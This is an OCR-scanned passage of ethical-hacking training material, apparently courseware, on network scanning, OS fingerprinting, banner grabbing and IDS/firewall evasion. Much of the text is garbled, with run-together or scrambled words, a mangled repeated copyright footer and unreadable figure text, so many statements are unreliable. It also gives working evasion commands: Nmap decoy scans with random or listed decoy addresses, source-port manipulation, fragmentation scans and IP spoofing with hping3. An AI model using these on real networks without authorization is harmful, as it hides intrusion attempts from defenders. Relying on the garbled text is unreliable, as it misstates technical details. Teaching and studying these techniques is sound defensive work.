cause for concern,provided that you secure your system portscanningby
or networkagainst
adopting
the followingcountermeasures:
=
Configure andIDSrulesto detectandblockprobes.
firewall
The firewall shouldbe capable of detecting probes
sent bythe attackersusingport
scanningtools. It shouldnot allowtraffic to passthroughit after simply
inspecting the
TCPheader.Thefirewallshouldbeable to examine the datacontainedi n eachpacket
beforeallowingthetrafficto passthrough it.
Run the portscanningtoolsagainst hostson the networkto determine whetherthe
firewallaccurately detectsthe portscanningactivity.
Somefirewallsdo a better jobthan othersi n terms of detecting stealthscans. For
example, many firewallshavespecific optionsto detectSYN scans, while others
completely ignore FINscans.
Ensure that the router,IDS,and firewall firmwareare updated with their latest
releases/versions.
Configurecommercial firewallsto protectyour networkagainst
fastportscansandSYN
floods.You can run toolssuchas portentryto detectand stopport scan attempts on
Linux/UNIX
systems.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Hackersuse
OS.Thus, tools
Nmap
suchas andperform
it is importantto employ
(https://www.snort.org)
OSdetectionto
intrusion detectionsystems
is an intrusion detection andprevention
sniffofa
thedetails remote
i n suchcases. Snort
technology thatis very
useful,mainly becausesignatures are frequently availablefromthe public authors.
Keep as few portsopenas possible
andfilter the rest,as the intruder will tryto enter
through anyopenport.Usea custom ruleset to lockdownthe network, blockunwanted
filter
portsat the firewall,
1745,and3268,
and the following ports: 135-159, 256-258, 389,445,1080,
Block
unwantedportsthe
services runningon the andupdate service versions.
Ensurethatthe versions of services running on the portsare non-vulnerable.
BlockinboundICMPmessage types andalloutboundICMPtype-3 unreachable
messages
at borderrouters arranged
in front of a company’s
main firewall
tryto perform
‘Attackers andsendpackets
source routing to the targets(which
may not
reachable
be
Hence,Internet)
using
host
via the
it is necessary
to ensure
an intermediate thatcan interact withthe
that your firewalland router can target.
blocksuchsource-
routing
techniques.filtering
Ensurethatthe mechanism usedfor routingand at the routers andfirewalls,
respectively,
cannot be bypassedusing a particular
source port or source-routing
methods.
Testyour IP addressspaceusingTCPand UDPportscansas well as ICMPprobes
to
determinethe networkconfiguration
andaccessible
ports.
andanti-spoofing
thattheanti-scanning
Ensure rulesare configured.
Ifacommercial
firewallisin use,thenensure that
©
©
with
Itis patched the latestupdates
Ithas correctly
definedantispoofing
rules
0. Its fastmodeservices are unusablei n CheckPoint Firewall-1environments
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
Tools BD
Seanning osciscereryGamercarting?
(05Fingerprinting)
Scanning
Beyond
IDSandFirewall
OSDiscovery
(Banner
Grabbing/OS
Fingerprinting)
An attackerusesOSdiscovery or banner grabbing
techniquesto identify
networkhostsrunning
and
OS
application versions
andits tools,
its types, exploits.
with known
This
as wellas useful
sectionintroducesyou to banner
countermeasuresthatyou can adopt against
it. grabbing
ical andCountermensores
Mackin ©by E-Comel
Copyright
OSDiscovery/Banner
Grabbing
target
oyster.
There
two
ar typesofbannerpabbingatv
the
isthemethod usedto determine
andpaseoperating
system on remote
running
AotiveBannerGrabbing BannerGrabbing
Passive
Specay
crafted
packets
resent
remote
Sanner
grabbing
from tothe OSand erormestogs
etermine
‘he
ndae
the
are than
responses
the08
with database
compared to te
Siting
5, So
networt
implementation
atheTCP/IP
sobbing
stack
rom
page Sonne ertensins
8 Discovery/Banner
Grabbing
Banner
grabbing,
“OS
a remotetarget
probability
or fingerprinting,―
system.
is a methodusedto determinethe OS
It is an importantscanningmethod,as theattacker
of successif the OSof the targetsystemis known(many
that is running on
will havea higher
vulnerabilitiesare OS-
The attacker
specific). can then formulatean attackstrategy basedon the OSof the target
system,
Thereare two methodsfor bannergrabbing:
spottingthe bannerwhile tryingto connect to @
service, suchas an FTPsite, and downloading
the binaryfile/bin/lsto checkthe system
architecture.
more advanced
‘A fingerprinting
technique dependso n stackquerying,whichtransfersthe
ICMP
response
analysis
method an of
fingerprint consistssending
is another usedto
messagesto a remote hostandevaluating
the reply.
OS.It ICMP
of bannergrabbing
Two types techniques
are described
below:
=
ActiveBannerGrabbing
bannergrabbing
‘Active applies that an OS'sIP stackhasa uniqueway of
the principle
respondingto specially
crafted TCPpackets.
This happensbecauseof different
thatvendorsapply
interpretations whileimplementing stackon a particular
the TCP/IP
ical andCountermensores
Mackin ©by E-Comel
Copyright
5. In active bannergrabbing,theattackersendsa variety packets
ofmalformed to the
remote host, andthe responsesare comparedwith a database. fromdifferent
Responses
of in
0 vary becausedifferences TCP/IP
Forinstance,the scanningutilityNmap
stackimplementation.
u sesa series of nine tests to determinean OS
or grabbing.
fingerprintbanner
bannergrabbing
Thetests listedbelowprovide
attack,as describedat www-packetwatch.net:
some insights into an active
©
port ECN-Echo
Test1: ATCPpacket
enabled
sent
withtheSYNand flags is to an open TCP
Test2: ATCPpacket
withno flags
enabledis sent to an openTCPport.Thistypeof
packet packet,
is @NULL
Test 3: A TCPpacket
withthe URG,
PSH, andFIN flags
SYN, enabledis sent to an open
TCP
port.
Test4:ATCPpacket withthe ACKflagenabledis sent to an open TCPport.
Test 5: A TCPpacket
withthe SYNflagenabledis sent to a closedTCPport.
Test6: A TCPpacket
withtheACKflag
enabled
i s sent to a closed
TCPport.
Test7: ATCPpacket
withtheURG, andFINflags
PSH, enabled
i s sent to a closedTCP
port.
an A
Test 8PU (PortUnreachable):UDPpacketis sent toaclosed UDPport.Theobjective
is to extract “ICMPportunreachable―
message fromthe targetmachine
Test9 TSeq(TCP Sequence abilitytest):Thistest tries to determinethe sequence
patterns
generation of the TCPinitialsequencenumbers(also knownas TCPISN
sampling),
the IPidentificationnumbers(also knownas IPIDsampling), andthe TCP
timestampnumbers.It sends six TCP packets
with the SYNflagenabled to an open
TCP
port.
Theobjective ofthesetestsisto find patterns
inthe intial sequenceof numbersthat the
TCPimplementations chosewhileresponding to a connection request.They c an be
categorized into groups, such as traditional 64K (many old UNIX boxes),random
increments (newer versions of Solaris,IRIX,FreeBSD, Digital
UNIX,Cray,andmany
others),
or true random(Linux 2.0.*,OpenVMS, newer AIX, etc).Windowsboxesuse a
"time-dependent" modeli n whichthe ISN is incrementedbya fixed amount for each
occurrence.
PassiveBanner
Grabbing
Source:https://www.symantec.com
Likeactive bannergrabbing, grabbing
passivebanner alsodepends
on thedifferential
implementation
of the stackandthe various waysi n whichan OSresponds to packets.
insteadof relying
However, on scanning thetargethost,passive fingerprinting captures
packets
fromthe targethostvia sniffing
to study
telltalesignsthat can reveala n OS.
ical andCountermensores
Mackin ©by E-Comel
Copyright
includes:
bannergrabbing
Passive
Bannergrabbingfrom error messages:
Errormessagesprovideinformation,
suchas
of
type server,typeof OS,andSSLtoolsusedbythe target
Sniffing
network
the
traffic: Capturing
andanalyzing
remote system.
fromthetargetenables
packets
Banner
to
an attacker determinetheOSusedbythe remote system.
©
Window
Whether
Size:
isFragment)
(Don’t
the DF
size
Window set
by
the
What the 0S?
theOSset theDFbit?
bit is set: Does
©
TOS(Type ofService):
DoestheOSset the TOS, andif so,whatsettingis it?
Passivefingerprinting
is neither fullyaccurate nor limited to thesefour signatures.
However, one can improveits accuracy bylooking and combining
at severalsignatures
the information.The following
is an analysis
of a sniffed packet
describedbyLance
Spitzner hispaper passive
in fingerprinting
on
(hetps://www.symantec.com/connect/articles/passive-fingerprinting):
04/20-21:41:48.129662129.142.224.3:659 -> 172.16.1.107:604
TCP TTL:45 TOS:0x0 1D:56257
***PS4A* Seq: 0x9DD90553
Ack: 0xE3C65D7 Win: 0x7D78
According the following
to thefour criteria, are identified:
o TTL:45
Window
32120
Size:0x7D78(or
DF:TheDFbit is set
decimal) in
© TOS:0x0
Compare
of
thisinformationwith a databasesignatures.
original
TIL: TheTLL fromthe analysis
is 45. Thethrough
packet
went 19 hops
to getto
the
the target,
so
packet sets
it
TTL
original
to
the
from a Linux or FreeBSD
database).
addedto the
TTL, that
appears
the
user
sent
64.Basedon this
box (however,
ThisTTLconfirms
it
more system
it byimplementing
signatures needto be
a traceroute to the remote
host.If the trace needsto be performed stealthily,
the traceroute TTL(default 30 hops)
can be set to one or two hops fewerthan the remote host(-moption). Settingthe
ical andCountermensores
Mackin ©by E-Comel
Copyright
traceroute in thismanner reveals (including
thepathinformation provider)
the upstream
without actually contactingthe remote host.
WindowSize:In this step, the window sizes are compared. Thewindowsize is another
effectivetool for determining preciselywhatwindowsize is usedandhow often it is
changed. In the previoussignature, the windowsize is set at 0x7078,
whichis thedefault
windowsize usedbyLinux.In addition,FreeBSD andSolaristend to maintain the same
windowsize throughout a session. However, Ciscorouters andMicrosoftWindowsNT
windowsizes
constantly
change.
the initial three-way size when
handshake
Thewindow is moreaccurate
(dueto TCPslowstart),
measured after
DF Most systems
makesit easier to identify
a few systems that do not use the DFflag(such a s SCOor
OpenBsb)
TOS:TOSis alsooflimitedvalue, as it seemsto bemore session-based
thanOS-based. In
otherwords,i t is not so muchthe OSas the protocol
usedthat determinesthe TOSto a
large
extent.
Usingthe information
obtained fromthe packet,
of the
specifically TTLand
compare the resultswith the databasesignatures
fone can
some degree ofconfidence(inthiscase,Linuxkernel2.2.x).
thewindowsize,
anddeterminethe OSwith
fingerprinting
Passive hasseveralotheruses. Forexample, attackers
can use stealthy
fingerprinting
to determinethe OSof a potential
targetsuchas a webserver. Auser only
needsto request a web pagefromthe server andthen analyze the sniffertraces. This
bypasses the needfor usingan active tool that various IDSsystemscan detect.Passive
fingerprinting
alsohelps i n identifying
remote proxyfirewalls.It maybe possible to ID
proxyfirewallsfromthe signatures as discussed above,simplybecauseproxyfirewalls
passivefingerprinting
rebuildconnections for clients.Similarly, can be usedto identify
roguesystems.
will passive
Note: We discuss
WhyBannerGrabbing?
banner
grabbing in latermodules.
attackeruses banner
‘An to
the
grabbingidentify OSusedo n the targethostandthusdetermine
that mightwork on that systemto carryout further
the systemvulnerabilitiesand exploits
attacks.
ical andCountermensores
Mackin ©by E-Comel
Copyright
How to Identify
Target
System
OS
theste ofpaca
naescon
"a Aachen identityth 0
Uve(Tt) andTe window nthe ead
the rst TEP
| switcoptre
ung fromthe
generated
response target machine pice i t
analyzing
detailsof theOS.Parameters certain
governthe functioning
parameters/fields
suchasTimeto Live(TTL)
i n these
various protocols
one can reveal
protocols,
andTCPwindowsize in the IPheaderof
such
the
a and TTL
the first packet
in a TCPsession helpidentify
the OSrunningon the targetmachine.The field
determinesthe maximum time that a packet can remain in network, the TCP windowsize
determines the lengthof the packetreported.Thesevaluesvary amongOSs, as describedi n the
following
table:
2.4
(Kernel
and
2.6) |
Operating
Linux
System TimeToLive
64
TCPWindowSize
5840
Google Linux 64 5720
FreeBsD 64 65535
OpenBSD 64 16384
Windows
95 32 8192
Windows2000 128 16384
WindowsXP 128 65535
Windows98,Vista,
and7 (Server
2008) 128 8192
(CiscoRouters)
10512.4
255 4128
ical andCountermensores
Mackin ©by E-Comel
Copyright
Solaris
7
AK 43 64
able3 3: TTand
L TCPWindow see values
for OS
Attackers
c an use various tools to performOSdiscoveryon the targetmachine,including
Wireshark,Nmap,Unicornscan, and NmapScript Attackerscan also adoptthe IPvé
Engine.
fingerprinting
methodto grab the targetOSdetails.
0 Discoveryusing
Wireshark
Source:https://www.wireshark.org
To identify sniff/capture
OS,
the target the responsegenerated
fromthe target
machineto the
machine
request-originated usingpacket-sniffing toolssuchas Wireshark,
etc.,andobservethe
TTL andTCP windowsize fieldsi n thefirst captured
TCPpacket.Bycomparing thesevalueswith
thosein the abovetable,
the
youcan determine targetOSthat hasgenerated
the
response.
Possible
OSisWindows
3.77:Wiveshack
Figure sereenshot
TIL is
showingvalue
(Possible
OS Windows}
ical andCountermensores
Mackin ©by E-Comel
Copyright
screenshotshowing
3.78:Wireshark
Figure
value
TT L
(Poelble
OSis
OSDiscovery and Unicornscan
using Nmap
8 Discovery andUnicornscan
usingNmap
0 Discovery
usingNmap
Source:https://amop.ora
To exploit
the target,i tis highly essentialto identify the OSrunning on the targetmachine.
Attackers can employvarious toolsto acquirethe OSdetails of the target.Nmap i s one ofthe
effectivetoolsfor performing OSdiscovery activities. In Zenmap, the -0 optionis usedto
perform OSdiscovery,whichdisplays theOSdetailsofthetargetmachine.
eco
373:05Discovery
Figure usingZenmap
ical andCountermensores
Mackin ©by E-Comel
Copyright
OSDiscovery
using
Unicornscan
Source:https://sourceforge.net
In Unicornscan,
acquired
the 0Sof the ta get machinecan beidentifiedbyobserving
scan result.To perform Unicornscan,
address> is used.A s showni n the screenshot,
the
TTL
values
the syntaxfunicornscan <target IP
the tt valueacquired
i n the
Possible
OSisWindows
Figure3.60:
05 Discovery
using
Uncoenscan
ical andCountermensores
Mackin ©by E-Comel
Copyright
OSDiscovery
using Nmap
Script
Engine
Nmap serpte ngine
(NSE) canbeused to
automatea widevarity ofnetworking
tasts by allowing
the users to write and
shore sets
tacks serps
0S
use various inthe Nmap
Script
Engine
to performdiscovery on
Forample,
sminbulserptin
through
‘machine
map, smbvos-dscover
thatean beused
or
theSMBprotec,
s
(©In Zenmap,
thes optionor
seit
option
08 Discovery
usingNmap
Script
Engine
Source:https://nmap.org
Engine
(NSE}
in be automate
NmapScripting
byallowing
same
variety Nmapcan usedto
users to write andsharescripts.
efficiency
andspeed as Nmap.
a wide of networking
c an beexecutedparallelly
Thesescripts
Attackerscan alsouse various scripts
tasks
withthe
i n the Nmap Script
Enginefor performingOSdiscovery on the targetmachine. Forexample, in Nmap, smb-os~
the
SMB for
discoveryis an inbuiltscriptused collecting
protocol.
OSinformationon the target machinethrough
ical andCountermensores
Mackin ©by E-Comel
Copyright
How] Services NmapOutput
eap
/
Ports HostsTopology
smb-o¥-dacoveynee
script
HostDetils
10.10.1010
Scan
eae
® rora1ar0 Starting tap 7.79
( netos://rmap.org
) at 2019-06-10
BAC Address:
st scciet results:
02:0C:29:79:02:09 (Wnware
10
windows 0s: Enterprise 17763 (windows
10
name’
NetBIOS.computer DESKTOO-EBISVL\x00
tine’16718:14;19005:38
2019-06 systen
Fiter
Hoss
3 usingNmap
Seript
sre 81:05Discovery Engine
ical andCountermensores
Mackin ©by E-Comel
Copyright
OSDiscovery Fingerprinting
using IPvé6
detection
with seporateO S
engine hats pele fr IG
08 Discovery
usingIPv6 Fingerprinting
Source:https://nmap.org
|Pv6Fingerprinting
is
It hasthe same functionality
responses,and matching
another
techniqueusedto identify
the OSrunningon the target
as IPv4,suchas sending probes,
machine.
waitingand collecting
themwith the databaseof fingerprints.
ThedifferencebetweenIPv6
the
andIPv4fingerprinting
is that IPv6usesseveraladditional
advancedIPv6-specific probes along
IPv6-specifc
with a separate OSdetectionengine. Nmapsendsnearly 18 probes i n the following
the
orderto identify targetOSusingthe IPv6fingerprintingmethod.
Sequence
=
ICMPv6 (1E1)
generation
echo
(S1-S6)
=
ICMPv6 (1E2)
echo (NI)
NodeInformationQuery
(NS)
Solicitation
Neighbor
=
UDP
(U1)
TCPexplicit notification(TECN)
congestion
=
TcP
In Zenmap,
(12-17)
the ~6 optionalong
with -0 OSdiscovery
optionis usedto perform usingthe IPv6
fingerprinting
method,
Syntax:
# nmap -6 -0 <target>
ical andCountermensores
Mackin ©by E-Comel
Copyright
BannerGrabbing
Countermeasures
Disabling
or
Changing
Banner Hiding ExtensionsfromWeb
File Page
server
hatcan
Ungerying teelogy anther
cont users
osche2th mod_ headers module-vsea
Aecte i n neta. feo change
banner Apache can use m od
negotiationrecive
BannerGrabbing
Countermeasures
+
Disabling
or Changing Banner
connect athe
to open a theon
Whenever portis open, it implies
port grabbing
that service/banner
usingbanner
is running it. Whenattackers
techniques, system a banner
presents
sensitive informationsuch as OS,server type,and version. Using
containing. the
gathered,
information the attacker specific
identifies andthen
vulnerabilitiesto exploit
launches
© falsebanners
Display
grabbing
attacks.Thecountermeasuresagainstbanner
to mislead
or deceive
attackers
attacksare as follows:
ical andCountermensores
Mackin ©by E-Comel
Copyright
FileExtensions
Hiding fromWebPages
File extensions reveal informationabout the underlying
server technology
that an
suchbannergrabbing
attackercan use to launchattacks.Thecountermeasuresagainst
attacksare as follows:
> Hidefileextensionsto maskthewebtechnology.
©
Replace applicationmappings suchas .aspwith .htmor .foo,
etc.,to disguise
the
identity
oftheservers.
© Apache
users directives.
can use mod_negotiation
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
Tools BD
Seanning osiscvery
Gamer crating?
(05Fingerprinting)
Scanning
Beyond
IDSandFirewall
ical andCountermensores
Mackin ©by E-Comel
Copyright
IDS/FirewallEvasionTechniques
(©.
Thouehfrewals and105san preventmalicious trafic (packets)
from enteringa network,attackerscan
to send
manage
intended to the target
packets byevading an DS of frewal throughthe following
BDrsetragmentation
TI cresting
custom
Pockets
ED source
Routing Host
Order Randomitng
port
EDsource manpuation8nd Sending Chackaums
TD
EDP
ascress
oecoy
Spooing
Adsees
Prony
Servers Avonyiers
IDS/Firewall EvasionTechniques
Althoughfirewallsand IDScan preventmalicioustraffic (packets)
from enteringa network,
attackers
can sendintended byimplementing
to thetargetthatevadethe IDS/firewall
packets
the following
techniques:
=
Theattackersendsfragmented
PacketFragmentation: probe packets
to the intended
thefragments
target,whichreassembles afterreceivingall of them
SourceRouting: The
the intendedtarget. attacker
specifies
path the routing forthemalformedpacket
to reach
IP AddressDecoy:
The
thatthe1DS/firewall attacker
generates
cannot determine manually
or
specifies
theactualIPaddress.
of decoys
IP addresses so
IP AddressSpoofing: Theattackerchanges
the source IPaddressesso that the attack
appearsto be comingfromsomeone else.
CreatingCustomPackets: sendscustom packets
Theattacker to scantheintended target
beyond thefirewalls.
to attacker
Randomizing
Host Order:The scans the numberof hostsi n the target
network
ina randomorder scan theintended the firewall
targetthat liesbeyond
Sending The attackersendspackets
Bad Checksums: TCP/UPD
with bad or bogus
tothe
checksums target.
intended
ical andCountermensores
Mackin ©by E-Comel
Copyright
Servers:Theattackerusesa chainof proxyservers to hidetheactualsource of a
Proxy
scan andevadecertain 1DS/firewall
restrictions.
Anonymizers: whichallowsthem to bypass
The attackeruses anonymizers, Internet
censorsandevadecertain IDSandfirewallrules.
ical andCountermensores
Mackin ©by E-Comel
Copyright
PacketFragmentation
|
Se
PacketFragmentation
Packetfragmentation refersto the splittingof a probe
packetinto severalsmallerpackets
(fragments)
whilesending it to a network.
When thesepackets
reach theIDSandfirewalls
a host,
behindthe hostgenerallyqueue all of themandprocessthemone byone, However, since this
methodof processinginvolvesgreaterCPU and networkresource consumption, the
configuration
of most IDScause themto skip fragmentedpackets
during portscans,
Therefore, attackersuse packet fragmentation toolssuchas Nmapand fragroute to splitthe
probe packet into smallerpackets that circumvent the port-scanning techniques employed by
IDS.
Once the host,
SYN/FIN
thesefragments
Scanning Using
reach destined
IP Fragments
theyare reassembled
packet.
to forma single
SYN/FIN scanning
techniques.
usingIPfragments
Thisprocess of
of scanning
is not a newscanning
w as developed
methodbut amodificationprevious
to avoidfalsepositives generated byother
packets of filtering
scans because a packet
the
target
to evadethe packet system.
TCP splits
deviceon
filter. Foranytransmission,
anddestinationportfor the initial packet (8-octet,
The header into several
everyTCPheadermust havethe source
64-bit)Theinitializedflagsi n the next packet
that detectsfragmented
protocol,andidentification.
via
allowthe remote hostto reassemble
the of
the
datapackets
the packets uponreceipt an Internet protocol
usingfield-equivalentvalues source,
module
destination,
ical andCountermensores
Mackin ©by E-Comel
Copyright
Srwy/rit
(Small
+ Port (n)
Fragments)
RST[ifportis closed)
Attacker
382:SYN/FIN
Figure scanning
scan,
In this
splits
the
TCPseveral
thesystem
network.However, fragments
transmits
over
IP reassembly
headerinto and them
on the server sidemay resulti n unpredictable
the
andabnormal
such
as ofthe
results,
dumps.
IP
header
data,
Some
hosts
fail
fragmentation
the fragmented
packets,
whichmayleadto crashes, reboots,
may to parseandreassemble
or even networkdevice monitoring
A ~£-v 10.10.10.10
Starting Nmap (nee
2019-08-10 11:03 EDT
pervertetry
Discovered
at 11:03,
3.83:SYN/FIN
Figure sean usingNmap
ical andCountermensores
Mackin ©by E-Comel
Copyright
Source Routing
(©
Acthe
pacet
travels router
examines
through
IPand
thenodes i nthenetwork e8ch
thenext hopto directthe packet
chooses to the destination
thedesthatlonadress
1©
Toute(without a
Sourceoutingrefers
wth
a othe intended
to sendingpacket
frewall10S-configured
destination partalyor completely
i n orderto evadean 0S or frewal
routers)
pected
In source
al
outing,t he attacker
makes
some or ofthese
Source Routing
IPdatagram
‘An containsvarious fields,
including
the IPoptions
field,whichstoressource routing
information
‘As
address
travelsthrough
andchooses
a through the packet
andincludeslst ofIP addresses
the packet the nodesin the network,
the next hopto directthepacket
travels
which to
eachrouter examines thedestinationIP
to thedestination.
its destination,
‘When
attackers
sendmalformed
packets hopthrough
thesepackets
to a target, various routers
and gateways to reachthe destination.In some cases,the routers i n the pathmight include
configured firewallsandIDSthat blocksuchpackets. To avoidthem,attackersenforce a looseor
strict source routing mechanism, i n whichthey manipulatethe IPaddresspathi n the IPoptions
fieldso thatthepacket
to reachthe destination,thereby
evading
path
takestheattacker-defined
firewalls (without
and
firewall-/IDS-configured
IDS.
routers)
figure
‘The belowshowssource routing,
wherethe originator
dictatesthe eventualroute of the
traffic
Destination
1D
Figure284:
SourceRouting
ical andCountermensores
Mackin ©by E-Comel
Copyright
SourcePortManipulation
|(©
refers
Sourceort manpustion actual
t o manipulating
ttoceurswhenafiewallsconiguredt
allowpackets
port
numbers
om wellknown
withcommon portnumbers
portstheM T T,DNS,FI,
inorderto
ee
Port
SourcePortManipulation
Sourceportmanipulation is a technique
usedfor bypassing the IDS/firewall,
wherethe actual
portnumbers are manipulated withcommon port numbers forevading certainIDSandfirewall
misconfigurations
rules.The main security occur becauseof blindly trustingthe source port
number. Theadministrator mostly configures
thefirewallbyallowingtheincomingtrafficfrom
well-knownportssuchas HTTP, DNS, FTP,
etc. Thefirewallcan simply
allowthe incomingtraffic
fromthe packetssent by
the attackersusingsuchcommon ports.
PeActual .
Manipulated
ker
Attackei Port:80
pono
Figure385:Frewalallowing
manipulated
port60to the Vietim fom attacker
Although
thefirewallscan bemadesecure usingapplication-level
proxies or protocol-parsing
firewall elements,
this techniquehelpsthe attackerto bypass the firewall rules easily.
The
attacker
tries
easily
bypass
to manipulatethe original
the IDS/firewall.
manipulation.
source port
port
In Zenmap, numberport which
can
with thecommon numbers,
the -g or --source-port optionis usedto perform
ical andCountermensores
Mackin ©by E-Comel
Copyright
>
Zenmop
SeanTooleBrofile Help
Target[103101030
Command:[rmap 98010707070
Hots
08 « Host
|| | -9
© 0101030
OutputHost
Sevices Nmap
‘map
Detail. Topology
Ports/Hosts
8010:10:10.0
Scant
Detais
Starting teap 7.70 ( nttps://nmap.org) at 2019-06-27
is latency).
Net
shown:
Host up (8.005
$97 #interes ports
5357/tepopen. wedans
Nesp
done: 1 IP adress (2 host vp) scanned in 5.26
Scanning
Frewallusing
53.86: over Nmap
ical andCountermensores
Mackin ©by E-Comel
Copyright
IP AddressDecoy
(@ address
decoy refers
technique oF manvaly
t o generating
ae scaring thenetwork
decoys
inorder
1@Thstechniquemates i fc forthe10S whichI Paddress
ofrewal to determine was acta canning
Decoy
Scanning
usingNmap
hastwo options
Nmap fordecoyscanning
random
decoys)
© nmap- D mx0:20 (target
(Generates numberof
IP AddressDecoy
TheIPaddressdecoy technique refersto generating or manually specifyingIPaddressesof the
decoysto evade1DS/firewalls.It appearsto thetargetthatthe decoys as wellas the host(s)
are
scanning
address
thenetwork.Thistechnique
is actually
scanning
makesi t difficultfor theIDS/firewall
the networkandwhichIP addresses
to determine
are decoys.
IP
which
TheNmap tool comes with a built-inscan function
scanning calleda decoy scan, whichcloaksa
scan with decoys.
Thistechniquegenerates multiple IPaddresses to perform a scan,thusmaking
it difficult
forthetargetsecuritymechanisms suchas IDS, firewalls,etc.,to identifythe original
source fromthe registeredlogs.ThetargetIDSmightreportscanningfrom5-0 IP addresses;
however,
IPs,
it
cannot
differentiate
thescanning addressdecoy
between actual IP andtheinnocuous
Youcan
‘+
of
perform
two types decoyscans
[target]
nmap-D RND:10
using Nmap:
Using
scan
this
andrandomly generates
command, automatically
arandomofdecoys
number
Nmap
for
the
the realIPaddressbetweenthe decoy
positions IPs.
that targetIP
Ex.Assume
scan command
will be:
address
Thus,
the
10.10.10.10isthe to bescanned. decoy
Nmap
ical andCountermensores
Mackin ©by E-Comel
Copyright
ScanTeclsBete Hep
Target [10101010
Command:[map
ORNOTO 19107010
Hoi)
05 « Howt
|
Services
Host
Nmap
m ap
/Herts Topology
Outpt Ports
-ORNO-10
10.1010.
Details Scans
Dati
© 0101010
( Starting Nap 7.70 nétpsi//omap.org
Indie Stanger
) at 2019-06-27
42:44
997
Nat-showns flitered por
AACAdseess:000¢:29:02:96:44 (Wware)
ure
387: RND
nmap-Ddecoy1,decoy2,decoy3,...,ME,...
Decoy
usingNmap
[target]
option
Using thiscommand,
oftheto
scan
the
you can manually
victim'snetwork.Here,you haveto separate
specify theIPaddresses
eachdecoy
decoys
IPwith a comma (,)andyoucan
use
the position
i n the 4'* position
accordingly.
your
optionally MEcommandto
ofthe command,
Thisis an optional
realIPi n the decoy
your realIP will be positioned
command,
list.If you place ME
at the 4" position
andif you do not mention ME i n your scan
‘command, then Nmap will automaticallyplaceyour realIP i n anyrandomposition.
Forexample, assumethat 10.10.10.16 i s the realsource IPand10.10.10.10 i s the target
IPaddress to bescanned, Then,the Nmapdecoy command will be:
Syntax
# nmap -D 192.168.0.1,172.120.2.8,192.168.2.8,10.10.10.16,10.10.10.5
10.10.10.10
ical andCountermensores
Mackin ©by E-Comel
Copyright
ScanToolsefile Hep
103030 Prt
172.1202.
map 0192.16.01
79216828
10101000]10701016
101005
IE
Serces
| -0 Host
Oetait
Nop OutputPons/Hoss Topology
192.168.172.102
nmap
192.1682
1010.10.16
1010.0.
Scans
Dati
© 0101010
(
Starting Heap 7.70 nttos://omap.org)
Indie Stenaard Ti ne
at 2019-06-27
12:46
AAC
3357/tepopen _wadapt
Adseesss000¢:29:02:96:44 (Wware)
decoys
‘These can begenerated
388:Decoy
Figure with
usingNmap
manual ist
decoy
in bothinitial pingscanssuchas ICMP,
SYN,ACK,
ete.,andduring
the actualportscanningphase.
decoy
IP address is a usefultechnique for hiding
your IP address.
However,it will not be
successfulif the targetemploysactive mechanisms suchas router pathtracing,response
dropping,etc. Moreover,usingmanydecoys can slowdownthe scanning and affectthe
process
accuracyof the scan.
ical andCountermensores
Mackin ©by E-Comel
Copyright
IP AddressSpoofing
IP
[©
spootng
refers addresses
1@Wen thevim esto
thesource P
to ehanging s o that
“a
IP AddressSpoofing
Mostfirewallsfilter packets
basedon the source IPaddress. Thesefirewallsexamine the source
IP addressanddeterminewhetherthe packet is comingfrom a legitimate source or an
illegitimate
source. The10Sfilters packetsfrom illegitimate
sources, Attackersuse IP spoofing
technique to bypasssuchIDS/firewalls.
IP
address
spoofing
altersthe packet
legitimate
isa hijacking
headers,
technique
andsendsrequestpackets
host.Thepackets
an obtains
a
i n which attacker computer's
to a targetmachine,
appearto be sent froma legitimate
IPaddress,
pretendingto be a
butare actually
machine sent
machine,
fromthe attacker’s while his/her
machine'sIPaddressis concealed.
Whenthe victim
replies
to theaddress,
Attackersmostly
it goesback
use IPaddress
to the
spoofing
spoofed
address
to perform to
andnot the attacker's
DoSattacks.
realaddress.
ical andCountermensores
Mackin ©by E-Comel
Copyright
IPspoofing
usingMping:
IP spoofing
usingHping3:
Figure
using
3.89:1PSpoofing Moines
Hping3wew.certifiedhacker.com -a 7.7.7.7
to perform
You can use Hping3 IP spoofing. helpsyou to sendarbitrary
Theabovecommand
TCP/IP
to hosts.
packetsnetwork
Note: You will not be able to complete
the three-way
handshakeand open a successful
TCP
connection with spoofed IPaddresses.
ical andCountermensores
Mackin ©by E-Comel
Copyright
|
IP Spoofing Direct TTLProbes
Detection Techniques: CEH
& SEER. 7
>
Spoofing
Detection
Techniques:
|
IP IP IdentificationNumber
Sipdazrbe
totes sone
sated a thatreas re and campare the wth the
01
02
thetPI0sare
dose
value
packet
being
checked,
not
the
suspected
s
in tothe then waffi spoofed
03 considered
Thistechnque reliable
even iftheattacker
inthe same subnet
&
03
Module 248
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
|
IP Spoofing TCPFlowControlMethod
Detection Techniques: (CEH
(@ Atacherssenting
(©Therefore,
targets
TCPpackets
spoofed wll ot
i n thecongestion
window
SYN-ACK
packets
1GWhen
received
awindow
exhausted,
packets
mos
kel
spoofed
watecontinues ater sels the are
IP Spoofing
DetectionTechniques
+
DirectTTLProbes
fora initially
In thistechnique,
reply. the
you
TTL
Check
packet
value
whether
(ping legitimate
with
thatof
senda
the
packet
request)
matches
in the reply
to the hostandwait
you
accordingif
checking.
are Although
Bothwill havethe same TTL theyare usingthe same protocol.
the initialTTLvaluesvary used,a fewinitial TTLvaluesare
to the protocol
commonly
used. TCP/UDP, they
For
are
thevaluesare 64and128;for ICMP, 128and255
sented 12.0.0510-TTU13
attacker
(Spooted
Address
10003)
cg
ee
Target
390:1 PSpoofing
Figure detection Direct
techniques TTL Probes
If the replyis froma differentprotocol, then you shouldcheckthe actualhopcount to
detectthe spoofed packets. Deductthe TTL valuei n the replyfromthe initialTTL valueto
determinethe hop
the TTL of the packet. count.
isa
Thepacket spoofed packetthe reply
if TTL
does
not
match
It will be very easyto launcha n attackif the attackerknowsthe
and
hopcount betweenthe source thehost.In thiscase,the test resultis a falsenegative.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Thistechnique
is successful
whentheattackeris i n a different
subnetfromthatofthe
victim,
Note: Normaltrafficfromone hostcan contrastTTLsdepending
on traffic patterns.
IP Identification
Number
Userscan identify spoofed packets bymonitoring the IPidentification(IPIO)numberin
the IP packet headers.The IPID increases incrementally eachtime a systemsendsa
packet. Every
IP packet on thenetwork hasa "fragment identification―
number, whichis
increased byone for every packet
senda probe packet
i n the reply.
transmission.To
to the source IP address
TheIPIDvaluei n the response packet ofidentify
